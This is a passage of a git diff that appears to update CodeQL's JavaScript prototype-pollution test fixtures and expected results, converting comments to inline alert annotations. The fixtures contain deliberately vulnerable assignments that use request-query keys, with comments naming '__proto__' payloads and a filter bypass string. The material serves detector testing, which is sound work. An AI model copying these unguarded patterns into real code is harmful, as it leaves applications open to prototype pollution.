@@ -239,31 +267,3 @@ nodes | tst.js:130:9:130:52 | req.que ... '), '') | semmle.label | req.que ... '), '') | subpaths | tst.js:14:27:14:31 | taint | tst.js:55:29:55:32 | prop | tst.js:56:12:56:33 | obj ? o ... : null | tst.js:14:5:14:32 | unsafeG ... taint) | -#select -| lib.js:6:7:6:9 | obj | lib.js:1:43:1:46 | path | lib.js:6:7:6:9 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:1:43:1:46 | path | library input | -| lib.js:15:3:15:14 | obj[path[0]] | lib.js:14:38:14:41 | path | lib.js:15:3:15:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:14:38:14:41 | path | library input | -| lib.js:22:3:22:14 | obj[path[0]] | lib.js:20:14:20:22 | arguments | lib.js:22:3:22:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:20:14:20:22 | arguments | library input | -| lib.js:26:10:26:21 | obj[path[0]] | lib.js:25:44:25:47 | path | lib.js:26:10:26:21 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:25:44:25:47 | path | library input | -| lib.js:34:3:34:14 | obj[path[0]] | lib.js:30:43:30:51 | arguments | lib.js:34:3:34:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:30:43:30:51 | arguments | library input | -| lib.js:42:3:42:14 | obj[path[0]] | lib.js:38:27:38:35 | arguments | lib.js:42:3:42:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:38:27:38:35 | arguments | library input | -| lib.js:87:10:87:14 | proto | lib.js:83:14:83:22 | arguments | lib.js:87:10:87:14 | proto | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. 
| lib.js:83:14:83:22 | arguments | library input | -| lib.js:108:3:108:10 | obj[one] | lib.js:104:13:104:21 | arguments | lib.js:108:3:108:10 | obj[one] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:104:13:104:21 | arguments | library input | -| lib.js:119:13:119:24 | obj[path[0]] | lib.js:118:29:118:32 | path | lib.js:119:13:119:24 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:118:29:118:32 | path | library input | -| lib.js:128:9:128:20 | obj[path[0]] | lib.js:127:14:127:17 | path | lib.js:128:9:128:20 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:127:14:127:17 | path | library input | -| otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] | otherlib/src/otherlibimpl.js:1:37:1:40 | path | otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | otherlib/src/otherlibimpl.js:1:37:1:40 | path | library input | -| sublib/other.js:6:7:6:18 | obj[path[0]] | sublib/other.js:5:28:5:31 | path | sublib/other.js:6:7:6:18 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | sublib/other.js:5:28:5:31 | path | library input | -| sublib/sub.js:2:3:2:14 | obj[path[0]] | sublib/sub.js:1:37:1:40 | path | sublib/sub.js:2:3:2:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | sublib/sub.js:1:37:1:40 | path | library input | -| tst.js:8:5:8:17 | object[taint] | tst.js:5:24:5:37 | req.query.data | tst.js:8:5:8:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. 
| tst.js:5:24:5:37 | req.query.data | user controlled input | -| tst.js:9:5:9:17 | object[taint] | tst.js:5:24:5:37 | req.query.data | tst.js:9:5:9:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | -| tst.js:14:5:14:32 | unsafeG ... taint) | tst.js:5:24:5:37 | req.query.data | tst.js:14:5:14:32 | unsafeG ... taint) | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | -| tst.js:34:5:34:7 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:34:5:34:7 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | -| tst.js:39:9:39:11 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:39:9:39:11 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | -| tst.js:45:9:45:11 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:45:9:45:11 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | -| tst.js:48:9:48:11 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:48:9:48:11 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | -| tst.js:80:5:80:17 | object[taint] | tst.js:77:24:77:37 | req.query.data | tst.js:80:5:80:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. 
| tst.js:77:24:77:37 | req.query.data | user controlled input | -| tst.js:82:5:82:22 | object["" + taint] | tst.js:77:24:77:37 | req.query.data | tst.js:82:5:82:22 | object["" + taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:77:24:77:37 | req.query.data | user controlled input | -| tst.js:87:9:87:21 | object[taint] | tst.js:77:24:77:37 | req.query.data | tst.js:87:9:87:21 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:77:24:77:37 | req.query.data | user controlled input | -| tst.js:94:5:94:37 | obj[req ... ', '')] | tst.js:94:9:94:19 | req.query.x | tst.js:94:5:94:37 | obj[req ... ', '')] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:94:9:94:19 | req.query.x | user controlled input | -| tst.js:97:5:97:46 | obj[req ... g, '')] | tst.js:97:9:97:19 | req.query.x | tst.js:97:5:97:46 | obj[req ... g, '')] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:97:9:97:19 | req.query.x | user controlled input | -| tst.js:105:5:105:17 | object[taint] | tst.js:102:24:102:37 | req.query.data | tst.js:105:5:105:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:102:24:102:37 | req.query.data | user controlled input | -| tst.js:130:5:130:53 | obj[req ... ), '')] | tst.js:130:9:130:19 | req.query.x | tst.js:130:5:130:53 | obj[req ... ), '')] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:130:9:130:19 | req.query.x | user controlled input | 
diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.qlref b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.qlref index 107951e169e1..3c441784c3b7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.qlref @@ -1 +1,2 @@ -Security/CWE-915/PrototypePollutingAssignment.ql \ No newline at end of file +query: Security/CWE-915/PrototypePollutingAssignment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js index fb550533d124..1c0563d679b5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js @@ -1,9 +1,9 @@ -module.exports.set = function recSet(obj, path, value) { +module.exports.set = function recSet(obj, path, value) { // $ Source var currentPath = path[0]; var currentValue = obj[currentPath]; if (path.length === 1) { if (currentValue === void 0) { - obj[currentPath] = value; // NOT OK + obj[currentPath] = value; // $ Alert } return currentValue; } 
@@ -11,35 +11,35 @@ module.exports.set = function recSet(obj, path, value) { return recSet(obj[currentPath], path.slice(1), value); } -module.exports.set2 = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK +module.exports.set2 = function (obj, path, value) { // $ Source + obj[path[0]][path[1]] = value; // $ Alert } module.exports.setWithArgs = function() { var obj = arguments[0]; - var path = arguments[1]; + var path = arguments[1]; // $ Source var value = arguments[2]; - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } -module.exports.usedInTest = function (obj, path, value) { - return obj[path[0]][path[1]] = value; // NOT OK +module.exports.usedInTest = function (obj, path, value) { // $ Source + return obj[path[0]][path[1]] = value; // $ Alert } module.exports.setWithArgs2 = function() { - const args = Array.prototype.slice.call(arguments); + const args = Array.prototype.slice.call(arguments); // $ Source var obj = args[0]; var path = args[1]; var value = args[2]; - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } module.exports.setWithArgs3 = function() { - const args = Array.from(arguments); + const args = Array.from(arguments); // $ Source var obj = args[0]; var path = args[1]; var value = args[2]; - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } function id(s) { @@ -52,7 +52,7 @@ module.exports.notVulnerable = function () { const path = id("x"); const value = id("y"); const obj = id("z"); - return (obj[path[0]][path[1]] = value); // OK + return (obj[path[0]][path[1]] = value); } class Foo { 
@@ -67,12 +67,12 @@ class Foo { const obj = this.obj; const path = this.path; const value = this.value; - return (obj[path[0]][path[1]] = value); // NOT OK + return (obj[path[0]][path[1]] = value); // $ MISSING: Alert - lacking local field step } safe() { const obj = this.obj; - obj[path[0]] = this.value; // OK + obj[path[0]] = this.value; } } @@ -80,11 +80,11 @@ module.exports.Foo = Foo; module.exports.delete = function() { var obj = arguments[0]; - var path = arguments[1]; - delete obj[path[0]]; // OK + var path = arguments[1]; // $ Source + delete obj[path[0]]; var prop = arguments[2]; var proto = obj[path[0]]; - delete proto[prop]; // NOT OK + delete proto[prop]; // $ Alert } module.exports.fixedProp = function (obj, path, value) { @@ -101,22 +101,22 @@ function isPossibilityOfPrototypePollution(key) { module.exports.sanWithFcuntion = function() { var obj = arguments[0]; - var one = arguments[1]; + var one = arguments[1]; // $ Source var two = arguments[2]; var value = arguments[3]; - obj[one][two] = value; // NOT OK + obj[one][two] = value; // $ Alert if (isPossibilityOfPrototypePollution(one) || isPossibilityOfPrototypePollution(two)) { throw new Error('Prototype pollution is not allowed'); } - obj[one][two] = value; // OK + obj[one][two] = value; } module.exports.returnsObj = function () { return { - set: function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + set: function (obj, path, value) { // $ Source + obj[path[0]][path[1]] = value; // $ Alert } } } @@ -124,8 +124,8 @@ module.exports.returnsObj = function () { class MyClass { constructor() {} - set(obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + set(obj, path, value) { // $ Source + obj[path[0]][path[1]] = value; // $ Alert } static staticSet(obj, path, value) { 
diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js index d74de12493aa..d1a00cfcc643 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js @@ -1,3 +1,3 @@ -module.exports.set = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK +module.exports.set = function (obj, path, value) { // $ Source + obj[path[0]][path[1]] = value; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js index 4d3e7a82f5c8..d0b7b4098a26 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js @@ -2,8 +2,8 @@ function Foobar() {} Foobar.prototype = { - method: function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + method: function (obj, path, value) { // $ Source + obj[path[0]][path[1]] = value; // $ Alert }, }; diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js index 66db628cfcc0..3ee6bef9f4ef 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js 
@@ -1,5 +1,5 @@ -module.exports.set = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK +module.exports.set = function (obj, path, value) { // $ Source + obj[path[0]][path[1]] = value; // $ Alert } var other = require('./other') diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js index a622a8913905..91fb71941b36 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js 
@@ -2,53 +2,53 @@ let express = require('express'); let app = express(); app.get('/', (req, res) => { - let taint = String(req.query.data); + let taint = String(req.query.data); // $ Source let object = {}; - object[taint][taint] = taint; // NOT OK - object[taint].foo = 'bar'; // NOT OK - may pollute, although attacker has no control over data being injected - object.baz[taint] = taint; // OK + object[taint][taint] = taint; // $ Alert + object[taint].foo = 'bar'; // $ Alert - may pollute, although attacker has no control over data being injected + object.baz[taint] = taint; mutateObject(object[taint], 'blah'); - unsafeGetProp(object, taint).foo = 'bar'; // NOT OK - unsafeGetProp(object, 'safe').foo = 'bar'; // OK + unsafeGetProp(object, taint).foo = 'bar'; // $ Alert + unsafeGetProp(object, 'safe').foo = 'bar'; - safeGetProp(object, taint).foo = 'bar'; // OK + safeGetProp(object, taint).foo = 'bar'; let possiblyProto = object[taint] || new Box(); possiblyProto.m(); let prototypeLessObject = Object.create(null); - prototypeLessObject[taint][taint] = taint; // OK + prototypeLessObject[taint][taint] = taint; let directlyMutated = {}; directlyMutated[taint] = taint; // OK - can't affect Object.prototype if (object.hasOwnProperty(taint)) { - object[taint].foo = 'bar'; // OK + object[taint].foo = 'bar'; } }); function mutateObject(obj, x) { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert if (obj instanceof Object) { - obj.foo = x; // OK + obj.foo = x; } if (obj != null) { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj === 'function') { - obj.foo = x; // OK + obj.foo = x; } if (typeof obj !== 'function') { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj === 'object') { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj !== 'object') { - obj.foo = x; // OK + obj.foo = x; } } 
@@ -74,42 +74,42 @@ class Box { app.get('/', (req, res) => { - let taint = String(req.query.data); + let taint = String(req.query.data); // $ Source let object = {}; - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert - object["" + taint]["" + taint] = taint; // NOT OK + object["" + taint]["" + taint] = taint; // $ Alert if (!taint.includes("__proto__")) { - object[taint][taint] = taint; // OK + object[taint][taint] = taint; } else { - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert } }); app.get('/foo', (req, res) => { let obj = {}; - obj[req.query.x.replace('_', '-')].x = 'foo'; // OK - obj[req.query.x.replace('_', '')].x = 'foo'; // NOT OK - obj[req.query.x.replace(/_/g, '')].x = 'foo'; // OK - obj[req.query.x.replace(/_/g, '-')].x = 'foo'; // OK - obj[req.query.x.replace(/__proto__/g, '')].x = 'foo'; // NOT OK - "__pr__proto__oto__" - obj[req.query.x.replace('o', '0')].x = 'foo'; // OK + obj[req.query.x.replace('_', '-')].x = 'foo'; + obj[req.query.x.replace('_', '')].x = 'foo'; // $ Alert + obj[req.query.x.replace(/_/g, '')].x = 'foo'; + obj[req.query.x.replace(/_/g, '-')].x = 'foo'; + obj[req.query.x.replace(/__proto__/g, '')].x = 'foo'; // $ Alert - "__pr__proto__oto__" + obj[req.query.x.replace('o', '0')].x = 'foo'; }); app.get('/bar', (req, res) => { - let taint = String(req.query.data); + let taint = String(req.query.data); // $ Source let object = {}; - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert const bad = ["__proto__", "constructor"]; if (bad.includes(taint)) { return; } - object[taint][taint] = taint; // OK + object[taint][taint] = taint; }); app.get('/assign', (req, res) => { 
@@ -126,7 +126,7 @@ app.get('/assign', (req, res) => { app.get('/foo', (req, res) => { let obj = {}; - obj[req.query.x.replace(new RegExp('_', 'g'), '')].x = 'foo'; // OK - obj[req.query.x.replace(new RegExp('_', ''), '')].x = 'foo'; // NOT OK - obj[req.query.x.replace(new RegExp('_', unknownFlags()), '')].x = 'foo'; // OK + obj[req.query.x.replace(new RegExp('_', 'g'), '')].x = 'foo'; + obj[req.query.x.replace(new RegExp('_', ''), '')].x = 'foo'; // $ Alert + obj[req.query.x.replace(new RegExp('_', unknownFlags()), '')].x = 'foo'; }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.expected b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.expected index bc4a6e4456a8..4546ee4b6aab 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.expected +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.expected 
@@ -1,656 +1,36 @@ -nodes -| examples/PrototypePollutingFunction.js:1:16:1:18 | dst | semmle.label | dst | -| examples/PrototypePollutingFunction.js:1:21:1:23 | src | semmle.label | src | -| examples/PrototypePollutingFunction.js:2:14:2:16 | key | semmle.label | key | -| examples/PrototypePollutingFunction.js:5:19:5:21 | dst | semmle.label | dst | -| examples/PrototypePollutingFunction.js:5:19:5:26 | dst[key] | semmle.label | dst[key] | -| examples/PrototypePollutingFunction.js:5:23:5:25 | key | semmle.label | key | -| examples/PrototypePollutingFunction.js:5:29:5:31 | src | semmle.label | src | -| examples/PrototypePollutingFunction.js:5:29:5:36 | src[key] | semmle.label | src[key] | -| examples/PrototypePollutingFunction.js:5:33:5:35 | key | semmle.label | key | -| examples/PrototypePollutingFunction.js:7:13:7:15 | dst | semmle.label | dst | -| examples/PrototypePollutingFunction.js:7:17:7:19 | key | semmle.label | key | -| examples/PrototypePollutingFunction.js:7:24:7:26 | src | semmle.label | src | -| examples/PrototypePollutingFunction.js:7:24:7:31 | src[key] | semmle.label | src[key] | -| examples/PrototypePollutingFunction.js:7:28:7:30 | key | semmle.label | key | -| examples/PrototypePollutingFunction_fixed2.js:1:21:1:23 | src | semmle.label | src | -| examples/PrototypePollutingFunction_fixed2.js:6:29:6:31 | src | semmle.label | src | -| examples/PrototypePollutingFunction_fixed2.js:6:29:6:36 | src[key] | semmle.label | src[key] | -| examples/PrototypePollutingFunction_fixed2.js:8:24:8:26 | src | semmle.label | src | -| examples/PrototypePollutingFunction_fixed2.js:8:24:8:31 | src[key] | semmle.label | src[key] | -| examples/PrototypePollutingFunction_fixed.js:1:21:1:23 | src | semmle.label | src | -| examples/PrototypePollutingFunction_fixed.js:2:14:2:16 | key | semmle.label | key | -| examples/PrototypePollutingFunction_fixed.js:5:29:5:31 | src | semmle.label | src | -| examples/PrototypePollutingFunction_fixed.js:5:29:5:36 | src[key] | semmle.label | 
src[key] | -| examples/PrototypePollutingFunction_fixed.js:7:17:7:19 | key | semmle.label | key | -| examples/PrototypePollutingFunction_fixed.js:7:24:7:26 | src | semmle.label | src | -| examples/PrototypePollutingFunction_fixed.js:7:24:7:31 | src[key] | semmle.label | src[key] | -| examples/PrototypePollutingFunction_fixed.js:7:28:7:30 | key | semmle.label | key | -| path-assignment.js:8:13:8:25 | key | semmle.label | key | -| path-assignment.js:8:19:8:25 | keys[i] | semmle.label | keys[i] | -| path-assignment.js:13:13:13:32 | target | semmle.label | target | -| path-assignment.js:13:22:13:27 | target | semmle.label | target | -| path-assignment.js:13:22:13:32 | target[key] | semmle.label | target[key] | -| path-assignment.js:13:29:13:31 | key | semmle.label | key | -| path-assignment.js:15:13:15:18 | target | semmle.label | target | -| path-assignment.js:15:20:15:22 | key | semmle.label | key | -| path-assignment.js:41:13:41:25 | key | semmle.label | key | -| path-assignment.js:41:19:41:25 | keys[i] | semmle.label | keys[i] | -| path-assignment.js:42:9:42:48 | target | semmle.label | target | -| path-assignment.js:42:18:42:23 | target | semmle.label | target | -| path-assignment.js:42:25:42:27 | key | semmle.label | key | -| path-assignment.js:42:32:42:37 | target | semmle.label | target | -| path-assignment.js:42:32:42:42 | target[key] | semmle.label | target[key] | -| path-assignment.js:42:32:42:48 | target[key] \|\| {} | semmle.label | target[key] \|\| {} | -| path-assignment.js:42:39:42:41 | key | semmle.label | key | -| path-assignment.js:44:5:44:10 | target | semmle.label | target | -| path-assignment.js:44:12:44:18 | keys[i] | semmle.label | keys[i] | -| path-assignment.js:58:13:58:25 | key | semmle.label | key | -| path-assignment.js:58:19:58:25 | keys[i] | semmle.label | keys[i] | -| path-assignment.js:59:9:59:48 | target | semmle.label | target | -| path-assignment.js:59:18:59:23 | target | semmle.label | target | -| path-assignment.js:59:25:59:27 | 
key | semmle.label | key | -| path-assignment.js:59:32:59:37 | target | semmle.label | target | -| path-assignment.js:59:32:59:42 | target[key] | semmle.label | target[key] | -| path-assignment.js:59:32:59:48 | target[key] \|\| {} | semmle.label | target[key] \|\| {} | -| path-assignment.js:59:39:59:41 | key | semmle.label | key | -| path-assignment.js:61:5:61:10 | target | semmle.label | target | -| path-assignment.js:61:12:61:18 | keys[i] | semmle.label | keys[i] | -| path-assignment.js:68:13:68:25 | key | semmle.label | key | -| path-assignment.js:68:19:68:25 | keys[i] | semmle.label | keys[i] | -| path-assignment.js:69:9:69:48 | target | semmle.label | target | -| path-assignment.js:69:18:69:23 | target | semmle.label | target | -| path-assignment.js:69:25:69:27 | key | semmle.label | key | -| path-assignment.js:69:32:69:37 | target | semmle.label | target | -| path-assignment.js:69:32:69:42 | target[key] | semmle.label | target[key] | -| path-assignment.js:69:32:69:48 | target[key] \|\| {} | semmle.label | target[key] \|\| {} | -| path-assignment.js:69:39:69:41 | key | semmle.label | key | -| path-assignment.js:71:5:71:10 | target | semmle.label | target | -| path-assignment.js:71:12:71:18 | keys[i] | semmle.label | keys[i] | -| tests.js:3:25:3:27 | dst | semmle.label | dst | -| tests.js:3:30:3:32 | src | semmle.label | src | -| tests.js:4:14:4:16 | key | semmle.label | key | -| tests.js:6:28:6:30 | dst | semmle.label | dst | -| tests.js:6:28:6:35 | dst[key] | semmle.label | dst[key] | -| tests.js:6:32:6:34 | key | semmle.label | key | -| tests.js:6:38:6:40 | src | semmle.label | src | -| tests.js:6:38:6:45 | src[key] | semmle.label | src[key] | -| tests.js:6:42:6:44 | key | semmle.label | key | -| tests.js:8:13:8:15 | dst | semmle.label | dst | -| tests.js:8:17:8:19 | key | semmle.label | key | -| tests.js:8:24:8:26 | src | semmle.label | src | -| tests.js:8:24:8:31 | src[key] | semmle.label | src[key] | -| tests.js:8:28:8:30 | key | semmle.label | key | -| 
tests.js:13:24:13:26 | dst | semmle.label | dst | -| tests.js:13:29:13:31 | src | semmle.label | src | -| tests.js:14:17:14:19 | src | semmle.label | src | -| tests.js:14:30:14:32 | key | semmle.label | key | -| tests.js:16:27:16:29 | dst | semmle.label | dst | -| tests.js:16:27:16:34 | dst[key] | semmle.label | dst[key] | -| tests.js:16:31:16:33 | key | semmle.label | key | -| tests.js:16:37:16:39 | src | semmle.label | src | -| tests.js:16:37:16:44 | src[key] | semmle.label | src[key] | -| tests.js:16:41:16:43 | key | semmle.label | key | -| tests.js:18:13:18:15 | dst | semmle.label | dst | -| tests.js:18:17:18:19 | key | semmle.label | key | -| tests.js:18:24:18:26 | src | semmle.label | src | -| tests.js:18:24:18:31 | src[key] | semmle.label | src[key] | -| tests.js:18:28:18:30 | key | semmle.label | key | -| tests.js:23:19:23:21 | dst | semmle.label | dst | -| tests.js:23:27:23:33 | sources [0] | semmle.label | sources [0] | -| tests.js:24:14:24:19 | source | semmle.label | source | -| tests.js:24:24:24:30 | sources [0] | semmle.label | sources [0] | -| tests.js:25:18:25:20 | key | semmle.label | key | -| tests.js:26:25:26:27 | dst | semmle.label | dst | -| tests.js:26:30:26:35 | source | semmle.label | source | -| tests.js:26:30:26:40 | source[key] | semmle.label | source[key] | -| tests.js:26:37:26:39 | key | semmle.label | key | -| tests.js:26:43:26:45 | key | semmle.label | key | -| tests.js:31:22:31:24 | dst | semmle.label | dst | -| tests.js:31:27:31:31 | value | semmle.label | value | -| tests.js:31:34:31:36 | key | semmle.label | key | -| tests.js:32:9:32:27 | dstValue | semmle.label | dstValue | -| tests.js:32:20:32:22 | dst | semmle.label | dst | -| tests.js:32:20:32:27 | dst[key] | semmle.label | dst[key] | -| tests.js:32:24:32:26 | key | semmle.label | key | -| tests.js:34:18:34:25 | dstValue | semmle.label | dstValue | -| tests.js:34:28:34:32 | value | semmle.label | value | -| tests.js:36:9:36:11 | dst | semmle.label | dst | -| 
tests.js:36:13:36:15 | key | semmle.label | key | -| tests.js:36:20:36:24 | value | semmle.label | value | -| tests.js:40:27:40:29 | dst | semmle.label | dst | -| tests.js:40:32:40:34 | src | semmle.label | src | -| tests.js:41:14:41:16 | key | semmle.label | key | -| tests.js:44:30:44:32 | dst | semmle.label | dst | -| tests.js:44:30:44:37 | dst[key] | semmle.label | dst[key] | -| tests.js:44:34:44:36 | key | semmle.label | key | -| tests.js:44:40:44:42 | src | semmle.label | src | -| tests.js:44:40:44:47 | src[key] | semmle.label | src[key] | -| tests.js:44:44:44:46 | key | semmle.label | key | -| tests.js:46:13:46:15 | dst | semmle.label | dst | -| tests.js:46:17:46:19 | key | semmle.label | key | -| tests.js:46:24:46:26 | src | semmle.label | src | -| tests.js:46:24:46:31 | src[key] | semmle.label | src[key] | -| tests.js:46:28:46:30 | key | semmle.label | key | -| tests.js:51:26:51:28 | dst | semmle.label | dst | -| tests.js:51:31:51:33 | src | semmle.label | src | -| tests.js:52:14:52:16 | key | semmle.label | key | -| tests.js:55:29:55:31 | dst | semmle.label | dst | -| tests.js:55:29:55:36 | dst[key] | semmle.label | dst[key] | -| tests.js:55:33:55:35 | key | semmle.label | key | -| tests.js:55:39:55:41 | src | semmle.label | src | -| tests.js:55:39:55:46 | src[key] | semmle.label | src[key] | -| tests.js:55:43:55:45 | key | semmle.label | key | -| tests.js:57:13:57:15 | dst | semmle.label | dst | -| tests.js:57:17:57:19 | key | semmle.label | key | -| tests.js:57:24:57:26 | src | semmle.label | src | -| tests.js:57:24:57:31 | src[key] | semmle.label | src[key] | -| tests.js:57:28:57:30 | key | semmle.label | key | -| tests.js:62:33:62:35 | src | semmle.label | src | -| tests.js:66:41:66:43 | src | semmle.label | src | -| tests.js:66:41:66:48 | src[key] | semmle.label | src[key] | -| tests.js:68:24:68:26 | src | semmle.label | src | -| tests.js:68:24:68:31 | src[key] | semmle.label | src[key] | -| tests.js:77:27:77:29 | src | semmle.label | src | -| 
tests.js:81:39:81:41 | src | semmle.label | src | -| tests.js:81:39:81:46 | src[key] | semmle.label | src[key] | -| tests.js:83:28:83:30 | src | semmle.label | src | -| tests.js:83:28:83:35 | src[key] | semmle.label | src[key] | -| tests.js:89:34:89:36 | src | semmle.label | src | -| tests.js:90:14:90:16 | key | semmle.label | key | -| tests.js:94:42:94:44 | src | semmle.label | src | -| tests.js:94:42:94:49 | src[key] | semmle.label | src[key] | -| tests.js:96:17:96:19 | key | semmle.label | key | -| tests.js:96:24:96:26 | src | semmle.label | src | -| tests.js:96:24:96:31 | src[key] | semmle.label | src[key] | -| tests.js:96:28:96:30 | key | semmle.label | key | -| tests.js:101:32:101:34 | dst | semmle.label | dst | -| tests.js:101:37:101:39 | src | semmle.label | src | -| tests.js:102:14:102:16 | key | semmle.label | key | -| tests.js:107:35:107:37 | dst | semmle.label | dst | -| tests.js:107:35:107:42 | dst[key] | semmle.label | dst[key] | -| tests.js:107:39:107:41 | key | semmle.label | key | -| tests.js:107:45:107:47 | src | semmle.label | src | -| tests.js:107:45:107:52 | src[key] | semmle.label | src[key] | -| tests.js:107:49:107:51 | key | semmle.label | key | -| tests.js:109:13:109:15 | dst | semmle.label | dst | -| tests.js:109:17:109:19 | key | semmle.label | key | -| tests.js:109:24:109:26 | src | semmle.label | src | -| tests.js:109:24:109:31 | src[key] | semmle.label | src[key] | -| tests.js:109:28:109:30 | key | semmle.label | key | -| tests.js:116:41:116:43 | src | semmle.label | src | -| tests.js:117:14:117:16 | key | semmle.label | key | -| tests.js:119:49:119:51 | src | semmle.label | src | -| tests.js:119:49:119:56 | src[key] | semmle.label | src[key] | -| tests.js:121:17:121:19 | key | semmle.label | key | -| tests.js:121:24:121:26 | src | semmle.label | src | -| tests.js:121:24:121:31 | src[key] | semmle.label | src[key] | -| tests.js:121:28:121:30 | key | semmle.label | key | -| tests.js:149:31:149:33 | dst | semmle.label | dst | -| 
